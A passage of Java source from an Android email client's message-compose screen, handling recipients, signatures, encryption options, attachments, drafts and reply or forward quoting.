int arraySize; int i; addressList = ""; if (extraEmail != null) { arraySize = extraEmail.length; for (i=0; i < arraySize; i++) { addressList += extraEmail[i]+", "; } } mToView.setText(addressList); addressList = ""; if (extraCc != null) { arraySize = extraCc.length; for (i=0; i < arraySize; i++) { addressList += extraCc[i]+", "; } } mCcView.setText(addressList); addressList = ""; if (extraBcc != null) { arraySize = extraBcc.length; for (i=0; i < arraySize; i++) { addressList += extraBcc[i]+", "; } } mBccView.setText(addressList); } if (mIdentity == null) { mIdentity = mAccount.getIdentity(0); } if (mAccount.isSignatureBeforeQuotedText()) { mSignatureView = upperSignature; lowerSignature.setVisibility(View.GONE); } else { mSignatureView = lowerSignature; upperSignature.setVisibility(View.GONE); } mSignatureView.addTextChangedListener(sigwatcher); if (!mIdentity.getSignatureUse()) { mSignatureView.setVisibility(View.GONE); } if (!mSourceMessageProcessed) { updateFrom(); updateSignature(); if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action) || ACTION_FORWARD.equals(action) || ACTION_EDIT_DRAFT.equals(action)) { /* * If we need to load the message we add ourself as a message listener here * so we can kick it off. Normally we add in onResume but we don't * want to reload the message every time the activity is resumed. * There is no harm in adding twice. */ MessagingController.getInstance(getApplication()).addListener(mListener); final Account account = Preferences.getPreferences(this).getAccount(mMessageReference.accountUuid); final String folderName = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; MessagingController.getInstance(getApplication()).loadMessageForView(account, folderName, sourceMessageUid, null); } if (!ACTION_EDIT_DRAFT.equals(action)) { String bccAddress = mAccount.getAlwaysBcc(); if ((bccAddress != null) && !("".equals(bccAddress))) { addAddress(mBccView, new Address(bccAddress, "")); } } /* if (K9.DEBUG) Log.d(K9.LOG_TAG, "action = " + action + ", account = " + mMessageReference.accountUuid + ", folder = " + mMessageReference.folderName + ", sourceMessageUid = " + mMessageReference.uid); */ if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action)) { if (K9.DEBUG) Log.d(K9.LOG_TAG, "Setting message ANSWERED flag to true"); // TODO: Really, we should wait until we send the message, but that would require saving the original // message info along with a Draft copy, in case it is left in Drafts for a while before being sent final Account account = Preferences.getPreferences(this).getAccount(mMessageReference.accountUuid); final String folderName = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; MessagingController.getInstance(getApplication()).setFlag(account, folderName, new String[] { sourceMessageUid }, Flag.ANSWERED, true); } updateTitle(); } if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action) || ACTION_EDIT_DRAFT.equals(action)) { //change focus to message body. 
mMessageContentView.requestFocus(); } mEncryptLayout = (View)findViewById(R.id.layout_encrypt); mCryptoSignatureCheckbox = (CheckBox)findViewById(R.id.cb_crypto_signature); mCryptoSignatureUserId = (TextView)findViewById(R.id.userId); mCryptoSignatureUserIdRest = (TextView)findViewById(R.id.userIdRest); mEncryptCheckbox = (CheckBox)findViewById(R.id.cb_encrypt); initializeCrypto(); if (mCrypto.isAvailable(this)) { mEncryptLayout.setVisibility(View.VISIBLE); mCryptoSignatureCheckbox.setOnClickListener(new OnClickListener() { @Override public void onClick(View v) { CheckBox checkBox = (CheckBox) v; if (checkBox.isChecked()) { mPreventDraftSaving = true; if (!mCrypto.selectSecretKey(MessageCompose.this)) { mPreventDraftSaving = false; } checkBox.setChecked(false); } else { mCrypto.setSignatureKeyId(0); updateEncryptLayout(); } } }); if (mAccount.getCryptoAutoSignature()) { long ids[] = mCrypto.getSecretKeyIdsFromEmail(this, mIdentity.getEmail()); if (ids != null && ids.length > 0) { mCrypto.setSignatureKeyId(ids[0]); mCrypto.setSignatureUserId(mCrypto.getUserId(this, ids[0])); } else { mCrypto.setSignatureKeyId(0); mCrypto.setSignatureUserId(null); } } updateEncryptLayout(); } else { mEncryptLayout.setVisibility(View.GONE); } mDraftNeedsSaving = false; } private void initializeCrypto() { if (mCrypto != null) { return; } mCrypto = CryptoProvider.createInstance(mAccount); } /** * Fill the encrypt layout with the latest data about signature key and encryption keys. */ public void updateEncryptLayout() { if (!mCrypto.hasSignatureKey()) { mCryptoSignatureCheckbox.setText(R.string.btn_crypto_sign); mCryptoSignatureCheckbox.setChecked(false); mCryptoSignatureUserId.setVisibility(View.INVISIBLE); mCryptoSignatureUserIdRest.setVisibility(View.INVISIBLE); } else { // if a signature key is selected, then the checkbox itself has no text mCryptoSignatureCheckbox.setText(""); mCryptoSignatureCheckbox.setChecked(true); mCryptoSignatureUserId.setVisibility(View.VISIBLE); mCryptoSignatureUserIdRest.setVisibility(View.VISIBLE); mCryptoSignatureUserId.setText(R.string.unknown_crypto_signature_user_id); mCryptoSignatureUserIdRest.setText(""); String userId = mCrypto.getSignatureUserId(); if (userId == null) { userId = mCrypto.getUserId(this, mCrypto.getSignatureKeyId()); mCrypto.setSignatureUserId(userId); } if (userId != null) { String chunks[] = mCrypto.getSignatureUserId().split(" <", 2); mCryptoSignatureUserId.setText(chunks[0]); if (chunks.length > 1) { mCryptoSignatureUserIdRest.setText("<" + chunks[1]); } } } } @Override public void onResume() { super.onResume(); MessagingController.getInstance(getApplication()).addListener(mListener); } @Override public void onPause() { super.onPause(); saveIfNeeded(); MessagingController.getInstance(getApplication()).removeListener(mListener); } /** * The framework handles most of the fields, but we need to handle stuff that we * dynamically show and hide: * Attachment list, * Cc field, * Bcc field, * Quoted text, */ @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); saveIfNeeded(); ArrayList<Uri> attachments = new ArrayList<Uri>(); for (int i = 0, count = mAttachments.getChildCount(); i < count; i++) { View view = mAttachments.getChildAt(i); Attachment attachment = (Attachment) view.getTag(); attachments.add(attachment.uri); } outState.putParcelableArrayList(STATE_KEY_ATTACHMENTS, attachments); outState.putBoolean(STATE_KEY_CC_SHOWN, mCcView.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_BCC_SHOWN, 
mBccView.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_QUOTED_TEXT_SHOWN, mQuotedTextBar.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_SOURCE_MESSAGE_PROCED, mSourceMessageProcessed); outState.putString(STATE_KEY_DRAFT_UID, mDraftUid); outState.putSerializable(STATE_IDENTITY, mIdentity); outState.putBoolean(STATE_IDENTITY_CHANGED, mIdentityChanged); outState.putSerializable(STATE_CRYPTO, mCrypto); outState.putString(STATE_IN_REPLY_TO, mInReplyTo); outState.putString(STATE_REFERENCES, mReferences); } @Override protected void onRestoreInstanceState(Bundle savedInstanceState) { super.onRestoreInstanceState(savedInstanceState); ArrayList<Parcelable> attachments = (ArrayList<Parcelable>) savedInstanceState.getParcelableArrayList(STATE_KEY_ATTACHMENTS); mAttachments.removeAllViews(); for (Parcelable p : attachments) { Uri uri = (Uri) p; addAttachment(uri); } mCcView.setVisibility(savedInstanceState.getBoolean(STATE_KEY_CC_SHOWN) ? View.VISIBLE : View.GONE); mBccView.setVisibility(savedInstanceState.getBoolean(STATE_KEY_BCC_SHOWN) ? View.VISIBLE : View.GONE); mQuotedTextBar.setVisibility(savedInstanceState.getBoolean(STATE_KEY_QUOTED_TEXT_SHOWN) ? View.VISIBLE : View.GONE); mQuotedText.setVisibility(savedInstanceState.getBoolean(STATE_KEY_QUOTED_TEXT_SHOWN) ? View.VISIBLE : View.GONE); mDraftUid = savedInstanceState.getString(STATE_KEY_DRAFT_UID); mIdentity = (Identity)savedInstanceState.getSerializable(STATE_IDENTITY); mIdentityChanged = savedInstanceState.getBoolean(STATE_IDENTITY_CHANGED); mCrypto = (CryptoProvider) savedInstanceState.getSerializable(STATE_CRYPTO); mInReplyTo = savedInstanceState.getString(STATE_IN_REPLY_TO); mReferences = savedInstanceState.getString(STATE_REFERENCES); initializeCrypto(); updateFrom(); updateSignature(); updateEncryptLayout(); mDraftNeedsSaving = false; } private void updateTitle() { if (mSubjectView.getText().length() == 0) { setTitle(R.string.compose_title); } else { setTitle(mSubjectView.getText().toString()); } } public void onFocusChange(View view, boolean focused) { if (!focused) { updateTitle(); } } private void addAddresses(MultiAutoCompleteTextView view, Address[] addresses) { if (addresses == null) { return; } for (Address address : addresses) { addAddress(view, address); } } private void addAddress(MultiAutoCompleteTextView view, Address address) { view.append(address + ", "); } private Address[] getAddresses(MultiAutoCompleteTextView view) { Address[] addresses = Address.parseUnencoded(view.getText().toString().trim()); return addresses; } private String buildText(boolean appendSig) { /* * Build the Body that will contain the text of the message. We'll decide where to * include it later. 
*/ String text = mMessageContentView.getText().toString(); if (appendSig && mAccount.isSignatureBeforeQuotedText()) { text = appendSignature(text); } if (mQuotedTextBar.getVisibility() == View.VISIBLE) { text += "\n" + mQuotedText.getText().toString(); } if (appendSig && mAccount.isSignatureBeforeQuotedText() == false) { text = appendSignature(text); } return text; } private MimeMessage createMessage(boolean appendSig) throws MessagingException { MimeMessage message = new MimeMessage(); message.addSentDate(new Date()); Address from = new Address(mIdentity.getEmail(), mIdentity.getName()); message.setFrom(from); message.setRecipients(RecipientType.TO, getAddresses(mToView)); message.setRecipients(RecipientType.CC, getAddresses(mCcView)); message.setRecipients(RecipientType.BCC, getAddresses(mBccView)); message.setSubject(mSubjectView.getText().toString()); message.setHeader("X-User-Agent", getString(R.string.message_header_mua)); final String replyTo = mIdentity.getReplyTo(); if (replyTo != null) { message.setReplyTo(new Address[] { new Address(replyTo) }); } if (mInReplyTo != null) { message.setInReplyTo(mInReplyTo); } if (mReferences != null) { message.setReferences(mReferences); } String text = null; if (mCrypto.getEncryptedData() != null) { text = mCrypto.getEncryptedData(); } else { text = buildText(appendSig); } TextBody body = new TextBody(text); if (mAttachments.getChildCount() > 0) { /* * The message has attachments that need to be included. First we add the part * containing the text that will be sent and then we include each attachment. */ MimeMultipart mp; mp = new MimeMultipart(); mp.addBodyPart(new MimeBodyPart(body, "text/plain")); for (int i = 0, count = mAttachments.getChildCount(); i < count; i++) { Attachment attachment = (Attachment) mAttachments.getChildAt(i).getTag(); MimeBodyPart bp = new MimeBodyPart( new LocalStore.LocalAttachmentBody(attachment.uri, getApplication())); /* * Correctly encode the filename here. Otherwise the whole * header value (all parameters at once) will be encoded by * MimeHeader.writeTo(). */ bp.addHeader(MimeHeader.HEADER_CONTENT_TYPE, String.format("%s;\n name=\"%s\"", attachment.contentType, EncoderUtil.encodeIfNecessary(attachment.name, EncoderUtil.Usage.WORD_ENTITY, 7))); bp.addHeader(MimeHeader.HEADER_CONTENT_TRANSFER_ENCODING, "base64"); /* * TODO: Oh the joys of MIME... * * From RFC 2183 (The Content-Disposition Header Field): * "Parameter values longer than 78 characters, or which * contain non-ASCII characters, MUST be encoded as specified * in [RFC 2184]." * * Example: * * Content-Type: application/x-stuff * title*1*=us-ascii'en'This%20is%20even%20more%20 * title*2*=%2A%2A%2Afun%2A%2A%2A%20 * title*3="isn't it!" */ bp.addHeader(MimeHeader.HEADER_CONTENT_DISPOSITION, String.format( "attachment;\n filename=\"%s\";\n size=%d", attachment.name, attachment.size)); mp.addBodyPart(bp); } message.setBody(mp); } else { /* * No attachments to include, just stick the text body in the message and call * it good. 
*/ message.setBody(body); } return message; } private String appendSignature(String text) { if (mIdentity.getSignatureUse()) { String signature = mSignatureView.getText().toString(); if (signature != null && !signature.contentEquals("")) { text += "\n" + signature; } } return text; } private void sendMessage() { new SendMessageTask().execute(); } private void saveMessage() { new SaveMessageTask().execute(); } private void saveIfNeeded() { if (!mDraftNeedsSaving || mPreventDraftSaving || mCrypto.hasEncryptionKeys()) { return; } mDraftNeedsSaving = false; saveMessage(); } public void onEncryptionKeySelectionDone() { if (mCrypto.hasEncryptionKeys()) { onSend(); } else { Toast.makeText(this, R.string.send_aborted, Toast.LENGTH_SHORT).show(); } } public void onEncryptDone() { if (mCrypto.getEncryptedData() != null) { onSend(); } else { Toast.makeText(this, R.string.send_aborted, Toast.LENGTH_SHORT).show(); } } private void onSend() { if (getAddresses(mToView).length == 0 && getAddresses(mCcView).length == 0 && getAddresses(mBccView).length == 0) { mToView.setError(getString(R.string.message_compose_error_no_recipients)); Toast.makeText(this, getString(R.string.message_compose_error_no_recipients), Toast.LENGTH_LONG).show(); return; } if (mEncryptCheckbox.isChecked() && !mCrypto.hasEncryptionKeys()) { // key selection before encryption String emails = ""; Address[][] addresses = new Address[][] { getAddresses(mToView), getAddresses(mCcView), getAddresses(mBccView) }; for (Address[] addressArray : addresses) { for (Address address : addressArray) { if (emails.length() != 0) { emails += ","; } emails += address.getAddress(); } } if (emails.length() != 0) { emails += ","; } emails += mIdentity.getEmail(); mPreventDraftSaving = true; if (!mCrypto.selectEncryptionKeys(MessageCompose.this, emails)) { mPreventDraftSaving = false; } return; } if (mCrypto.hasEncryptionKeys() || mCrypto.hasSignatureKey()) { if (mCrypto.getEncryptedData() == null) { String text = buildText(true); mPreventDraftSaving = true; if (!mCrypto.encrypt(this, text)) { mPreventDraftSaving = false; } return; } } sendMessage(); mDraftNeedsSaving = false; finish(); } private void onDiscard() { if (mDraftUid != null) { MessagingController.getInstance(getApplication()).deleteDraft(mAccount, mDraftUid); mDraftUid = null; } mHandler.sendEmptyMessage(MSG_DISCARDED_DRAFT); mDraftNeedsSaving = false; finish(); } private void onSave() { mDraftNeedsSaving = true; saveIfNeeded(); finish(); } private void onAddCcBcc() { mCcView.setVisibility(View.VISIBLE); mBccView.setVisibility(View.VISIBLE); } /** * Kick off a picker for whatever kind of MIME types we'll accept and let Android take over. */ private void onAddAttachment() { if (K9.isGalleryBuggy()) { if (K9.useGalleryBugWorkaround()) { Toast.makeText(MessageCompose.this, getString(R.string.message_compose_use_workaround), Toast.LENGTH_LONG).show(); } else { Toast.makeText(MessageCompose.this, getString(R.string.message_compose_buggy_gallery), Toast.LENGTH_LONG).show(); } } onAddAttachment2(K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES[0]); } /** * Kick off a picker for the specified MIME type and let Android take over. 
*/ private void onAddAttachment2(final String mime_type) { if (mCrypto.isAvailable(this)) { Toast.makeText(this, R.string.attachment_encryption_unsupported, Toast.LENGTH_LONG).show(); } Intent i = new Intent(Intent.ACTION_GET_CONTENT); i.addCategory(Intent.CATEGORY_OPENABLE); i.setType(mime_type); startActivityForResult(Intent.createChooser(i, null), ACTIVITY_REQUEST_PICK_ATTACHMENT); } private void addAttachment(Uri uri) { addAttachment(uri, -1, null); } private void addAttachment(Uri uri, int size, String name) { ContentResolver contentResolver = getContentResolver(); Attachment attachment = new Attachment(); attachment.name = name; attachment.size = size; attachment.uri = uri; if (attachment.size == -1 || attachment.name == null) { Cursor metadataCursor = contentResolver.query(uri, new String[] { OpenableColumns.DISPLAY_NAME, OpenableColumns.SIZE }, null, null, null); if (metadataCursor != null) { try { if (metadataCursor.moveToFirst()) { if (attachment.name == null) { attachment.name = metadataCursor.getString(0); } if (attachment.size == -1) { attachment.size = metadataCursor.getInt(1); Log.v(K9.LOG_TAG, "size: " + attachment.size); } } } finally { metadataCursor.close(); } } } if (attachment.name == null) { attachment.name = uri.getLastPathSegment(); } String contentType = contentResolver.getType(uri); if (contentType == null) { contentType = MimeUtility.getMimeTypeByExtension(attachment.name); } attachment.contentType = contentType; if (attachment.size<=0) { String uriString = uri.toString(); if (uriString.startsWith("file://")) { Log.v(K9.LOG_TAG, uriString.substring("file://".length())); File f = new File(uriString.substring("file://".length())); attachment.size = f.length(); } else { Log.v(K9.LOG_TAG, "Not a file: " + uriString); } } else { Log.v(K9.LOG_TAG, "old attachment.size: " + attachment.size); } Log.v(K9.LOG_TAG, "new attachment.size: " + attachment.size); View view = getLayoutInflater().inflate(R.layout.message_compose_attachment, mAttachments, false); TextView nameView = (TextView)view.findViewById(R.id.attachment_name); ImageButton delete = (ImageButton)view.findViewById(R.id.attachment_delete); nameView.setText(attachment.name); delete.setOnClickListener(this); delete.setTag(view); view.setTag(attachment); mAttachments.addView(view); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { // if a CryptoSystem activity is returning, then mPreventDraftSaving was set to true mPreventDraftSaving = false; if (mCrypto.onActivityResult(this, requestCode, resultCode, data)) { return; } if (resultCode != RESULT_OK) return; if (data == null) { return; } switch (requestCode) { case ACTIVITY_REQUEST_PICK_ATTACHMENT: addAttachment(data.getData()); mDraftNeedsSaving = true; break; case ACTIVITY_CHOOSE_IDENTITY: onIdentityChosen(data); break; case ACTIVITY_CHOOSE_ACCOUNT: onAccountChosen(data); break; } } private void onAccountChosen(final Intent intent) { final Bundle extras = intent.getExtras(); final String uuid = extras.getString(ChooseAccount.EXTRA_ACCOUNT); final Identity identity = (Identity) extras.getSerializable(ChooseAccount.EXTRA_IDENTITY); final Account account = Preferences.getPreferences(this).getAccount(uuid); if (!mAccount.equals(account)) { if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Switching account from " + mAccount + " to " + account); } // on draft edit, make sure we don't keep previous message UID if (ACTION_EDIT_DRAFT.equals(getIntent().getAction())) { mMessageReference = null; } // test whether there is something to save if 
(mDraftNeedsSaving || (mDraftUid != null)) { final String previousDraftUid = mDraftUid; final Account previousAccount = mAccount; // make current message appear as new mDraftUid = null; // actual account switch mAccount = account; if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Account switch, saving new draft in new account"); } saveMessage(); if (previousDraftUid != null) { if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Account switch, deleting draft from previous account: " + previousDraftUid); } MessagingController.getInstance(getApplication()).deleteDraft(previousAccount, previousDraftUid); } } else { mAccount = account; } // not sure how to handle mFolder, mSourceMessage? } switchToIdentity(identity); } private void onIdentityChosen(Intent intent) { Bundle bundle = intent.getExtras();; switchToIdentity((Identity)bundle.getSerializable(ChooseIdentity.EXTRA_IDENTITY)); } private void switchToIdentity(Identity identity) { mIdentity = identity; mIdentityChanged = true; mDraftNeedsSaving = true; updateFrom(); updateSignature(); } private void updateFrom() { if (mIdentityChanged) { mFromView.setVisibility(View.VISIBLE); } mFromView.setText(getString(R.string.message_view_from_format, mIdentity.getName(), mIdentity.getEmail())); } private void updateSignature() { if (mIdentity.getSignatureUse()) { mSignatureView.setText(mIdentity.getSignature()); mSignatureView.setVisibility(View.VISIBLE); } else { mSignatureView.setVisibility(View.GONE); } } public void onClick(View view) { switch (view.getId()) { case R.id.attachment_delete: /* * The view is the delete button, and we have previously set the tag of * the delete button to the view that owns it. We don't use parent because the * view is very complex and could change in the future. */ mAttachments.removeView((View) view.getTag()); mDraftNeedsSaving = true; break; case R.id.quoted_text_delete: mQuotedTextBar.setVisibility(View.GONE); mQuotedText.setVisibility(View.GONE); mDraftNeedsSaving = true; break; } } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case R.id.send: mCrypto.setEncryptionKeys(null); onSend(); break; case R.id.save: onSave(); break; case R.id.discard: onDiscard(); break; case R.id.add_cc_bcc: onAddCcBcc(); break; case R.id.add_attachment: onAddAttachment(); break; case R.id.add_attachment_image: onAddAttachment2("image/*"); break; case R.id.add_attachment_video: onAddAttachment2("video/*"); break; case R.id.choose_identity: onChooseIdentity(); break; default: return super.onOptionsItemSelected(item); } return true; } private void onChooseIdentity() { // keep things simple: trigger account choice only if there are more // than 1 account if (Preferences.getPreferences(this).getAccounts().length > 1) { final Intent intent = new Intent(this, ChooseAccount.class); intent.putExtra(ChooseAccount.EXTRA_ACCOUNT, mAccount.getUuid()); intent.putExtra(ChooseAccount.EXTRA_IDENTITY, mIdentity); startActivityForResult(intent, ACTIVITY_CHOOSE_ACCOUNT); } else if (mAccount.getIdentities().size() > 1) { Intent intent = new Intent(this, ChooseIdentity.class); intent.putExtra(ChooseIdentity.EXTRA_ACCOUNT, mAccount.getUuid()); startActivityForResult(intent, ACTIVITY_CHOOSE_IDENTITY); } else { Toast.makeText(this, getString(R.string.no_identities), Toast.LENGTH_LONG).show(); } } @Override public boolean onCreateOptionsMenu(Menu menu) { super.onCreateOptionsMenu(menu); getMenuInflater().inflate(R.menu.message_compose_option, menu); /* * Show the menu items "Add attachment (Image)" and "Add attachment (Video)" * if the 
work-around for the Gallery bug is enabled (see Issue 1186). */ int found = 0; for (int i = menu.size() - 1; i >= 0; i--) { MenuItem item = menu.getItem(i); int id = item.getItemId(); if ((id == R.id.add_attachment_image) || (id == R.id.add_attachment_video)) { item.setVisible(K9.useGalleryBugWorkaround()); found++; } // We found all the menu items we were looking for. So stop here. if (found == 2) break; } return true; } @Override public void onBackPressed() { // This will be called either automatically for you on 2.0 // or later, or by the code above on earlier versions of the // platform. if (mDraftNeedsSaving) { showDialog(DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE); } else { finish(); } } @Override public Dialog onCreateDialog(int id) { switch (id) { case DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE: return new AlertDialog.Builder(this) .setTitle(R.string.save_or_discard_draft_message_dlg_title) .setMessage(R.string.save_or_discard_draft_message_instructions_fmt) .setPositiveButton(R.string.save_draft_action, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int whichButton) { dismissDialog(1); onSave(); } }) .setNegativeButton(R.string.discard_action, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int whichButton) { dismissDialog(1); onDiscard(); } }) .create(); } return super.onCreateDialog(id); } @Override public boolean onKeyDown(int keyCode, KeyEvent event) { if ( // TODO - when we move to android 2.0, uncomment this. // android.os.Build.VERSION.SDK_INT < android.os.Build.VERSION_CODES.ECLAIR && keyCode == KeyEvent.KEYCODE_BACK && event.getRepeatCount() == 0 && K9.manageBack()) { // Take care of calling this method on earlier versions of // the platform where it doesn't exist. onBackPressed(); return true; } return super.onKeyDown(keyCode, event); } /** * Returns true if all attachments were able to be attached, otherwise returns false. */ private boolean loadAttachments(Part part, int depth) throws MessagingException { if (part.getBody() instanceof Multipart) { Multipart mp = (Multipart) part.getBody(); boolean ret = true; for (int i = 0, count = mp.getCount(); i < count; i++) { if (!loadAttachments(mp.getBodyPart(i), depth + 1)) { ret = false; } } return ret; } else { String contentType = MimeUtility.unfoldAndDecode(part.getContentType()); String name = MimeUtility.getHeaderParameter(contentType, "name"); if (name != null) { Body body = part.getBody(); if (body != null && body instanceof LocalAttachmentBody) { final Uri uri = ((LocalAttachmentBody) body).getContentUri(); mHandler.post(new Runnable() { public void run() { addAttachment(uri); } }); } else { return false; } } return true; } } /** * Pull out the parts of the now loaded source message and apply them to the new message * depending on the type of message being composed. * @param message */ private void processSourceMessage(Message message) { String action = getIntent().getAction(); if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action)) { try { if (message.getSubject() != null && !message.getSubject().toLowerCase().startsWith("re:")) { mSubjectView.setText("Re: " + message.getSubject()); } else { mSubjectView.setText(message.getSubject()); } /* * If a reply-to was included with the message use that, otherwise use the from * or sender address. 
*/ Address[] replyToAddresses; if (message.getReplyTo().length > 0) { addAddresses(mToView, replyToAddresses = message.getReplyTo()); } else { addAddresses(mToView, replyToAddresses = message.getFrom()); } if (message.getMessageId() != null && message.getMessageId().length() > 0) { String messageId = message.getMessageId(); mInReplyTo = messageId; if (message.getReferences() != null && message.getReferences().length > 0) { StringBuffer buffy = new StringBuffer(); for (int i=0; i < message.getReferences().length; i++) buffy.append(message.getReferences()[i]); mReferences = buffy.toString() + " " + mInReplyTo; } else { mReferences = mInReplyTo; } } else { if (K9.DEBUG) Log.d(K9.LOG_TAG, "could not get Message-ID."); } Part part = MimeUtility.findFirstPartByMimeType(mSourceMessage, "text/plain"); if (part != null || mSourceMessageBody != null) { String quotedText = String.format( getString(R.string.message_compose_reply_header_fmt), Address.toString(mSourceMessage.getFrom())); final String prefix = mAccount.getQuotePrefix(); // "$" and "\" in the quote prefix have to be escaped for // the replaceAll() invocation. final String escapedPrefix = prefix.replaceAll("(\\\\|\\$)", "\\\\$1"); if (mSourceMessageBody != null) { quotedText += mSourceMessageBody.replaceAll("(?m)^", escapedPrefix); } else { quotedText += MimeUtility.getTextFromPart(part).replaceAll( "(?m)^", escapedPrefix); } quotedText = quotedText.replaceAll("\\\r", ""); mQuotedText.setText(quotedText); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } if (ACTION_REPLY_ALL.equals(action) || ACTION_REPLY.equals(action)) { Identity useIdentity = null; for (Address address : message.getRecipients(RecipientType.TO)) { Identity identity = mAccount.findIdentity(address); if (identity != null) { useIdentity = identity; break; } } if (useIdentity == null) { if (message.getRecipients(RecipientType.CC).length > 0) { for (Address address : message.getRecipients(RecipientType.CC)) { Identity identity = mAccount.findIdentity(address); if (identity != null) { useIdentity = identity; break; } } } } if (useIdentity != null) { Identity defaultIdentity = mAccount.getIdentity(0); if (useIdentity != defaultIdentity) { switchToIdentity(useIdentity); } } } if (ACTION_REPLY_ALL.equals(action)) { for (Address address : message.getRecipients(RecipientType.TO)) { if (!mAccount.isAnIdentity(address)) { addAddress(mToView, address); } } if (message.getRecipients(RecipientType.CC).length > 0) { for (Address address : message.getRecipients(RecipientType.CC)) { if (!mAccount.isAnIdentity(address) && !Utility.arrayContains(replyToAddresses, address)) { addAddress(mCcView, address); } } mCcView.setVisibility(View.VISIBLE); } } } catch (MessagingException me) { /* * This really should not happen at this point but if it does it's okay. * The user can continue composing their message. 
*/ } } else if (ACTION_FORWARD.equals(action)) { try { if (message.getSubject() != null && !message.getSubject().toLowerCase().startsWith("fwd:")) { mSubjectView.setText("Fwd: " + message.getSubject()); } else { mSubjectView.setText(message.getSubject()); } Part part = MimeUtility.findFirstPartByMimeType(message, "text/plain"); if (part == null) { part = MimeUtility.findFirstPartByMimeType(message, "text/html"); } if (part != null || mSourceMessageBody != null) { String quotedText = mSourceMessageBody; if (quotedText == null) { quotedText = MimeUtility.getTextFromPart(part); } if (quotedText != null) { String text = String.format( getString(R.string.message_compose_fwd_header_fmt), mSourceMessage.getSubject(), Address.toString(mSourceMessage.getFrom()), Address.toString( mSourceMessage.getRecipients(RecipientType.TO)), Address.toString( mSourceMessage.getRecipients(RecipientType.CC))); quotedText = quotedText.replaceAll("\\\r", ""); text += quotedText; mQuotedText.setText(text); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } } if (!mSourceMessageProcessed) { if (!loadAttachments(message, 0)) { mHandler.sendEmptyMessage(MSG_SKIPPED_ATTACHMENTS); } } } catch (MessagingException me) { /* * This really should not happen at this point but if it does it's okay. * The user can continue composing their message. */ } } else if (ACTION_EDIT_DRAFT.equals(action)) { try { mDraftUid = message.getUid(); mSubjectView.setText(message.getSubject()); addAddresses(mToView, message.getRecipients(RecipientType.TO)); if (message.getRecipients(RecipientType.CC).length > 0) { addAddresses(mCcView, message.getRecipients(RecipientType.CC)); mCcView.setVisibility(View.VISIBLE); } if (message.getRecipients(RecipientType.BCC).length > 0) { addAddresses(mBccView, message.getRecipients(RecipientType.BCC)); mBccView.setVisibility(View.VISIBLE); } // Read In-Reply-To header from draft final String[] inReplyTo = message.getHeader("In-Reply-To"); if ((inReplyTo != null) && (inReplyTo.length >= 1)) { mInReplyTo = inReplyTo[0]; } // Read References header from draft final String[] references = message.getHeader("References"); if ((references != null) && (references.length >= 1)) { mReferences = references[0]; } if (!mSourceMessageProcessed) { loadAttachments(message, 0); } Integer bodyLength = null; String[] k9identities = message.getHeader(K9.K9MAIL_IDENTITY); if (k9identities != null && k9identities.length > 0) { String k9identity = k9identities[0]; if (k9identity != null) { if (K9.DEBUG) Log.d(K9.LOG_TAG, "Got a saved identity: " + k9identity); StringTokenizer tokens = new StringTokenizer(k9identity, ":", false); String bodyLengthS = null; String name = null; String email = null; String signature = null; boolean signatureUse = message.getFolder().getAccount().getSignatureUse(); if (tokens.hasMoreTokens()) { bodyLengthS = Utility.base64Decode(tokens.nextToken()); try { bodyLength = Integer.parseInt(bodyLengthS); } catch (Exception e) { Log.e(K9.LOG_TAG, "Unable to parse bodyLength '" + bodyLengthS + "'"); } } if (tokens.hasMoreTokens()) { signatureUse = true; signature = Utility.base64Decode(tokens.nextToken()); } if (tokens.hasMoreTokens()) { name = Utility.base64Decode(tokens.nextToken()); } if (tokens.hasMoreTokens()) { email = Utility.base64Decode(tokens.nextToken()); } Identity newIdentity = new Identity(); newIdentity.setSignatureUse(signatureUse); if (signature != null) { newIdentity.setSignature(signature); mSignatureChanged = true; } else { 
newIdentity.setSignature(mIdentity.getSignature()); } if (name != null) { newIdentity.setName(name); mIdentityChanged = true; } else { newIdentity.setName(mIdentity.getName()); } if (email != null) { newIdentity.setEmail(email); mIdentityChanged = true; } else { newIdentity.setEmail(mIdentity.getEmail()); } mIdentity = newIdentity; updateSignature(); updateFrom(); } } Part part = MimeUtility.findFirstPartByMimeType(message, "text/plain"); if (part != null) { String text = MimeUtility.getTextFromPart(part); if (bodyLength != null && bodyLength + 1 < text.length()) // + 1 to get rid of the newline we added when saving the draft { String bodyText = text.substring(0, bodyLength); String quotedText = text.substring(bodyLength + 1, text.length()); mMessageContentView.setText(bodyText); mQuotedText.setText(quotedText); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } else { mMessageContentView.setText(text); } } } catch (MessagingException me) { // TODO } } mSourceMessageProcessed = true; mDraftNeedsSaving = false; } class Listener extends MessagingListener { @Override public void loadMessageForViewStarted(Account account, String folder, String uid) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_ON); } @Override public void loadMessageForViewFinished(Account account, String folder, String uid, Message message) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_OFF); } @Override public void loadMessageForViewBodyAvailable(Account account, String folder, String uid, final Message message) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mSourceMessage = message; runOnUiThread(new Runnable() { public void 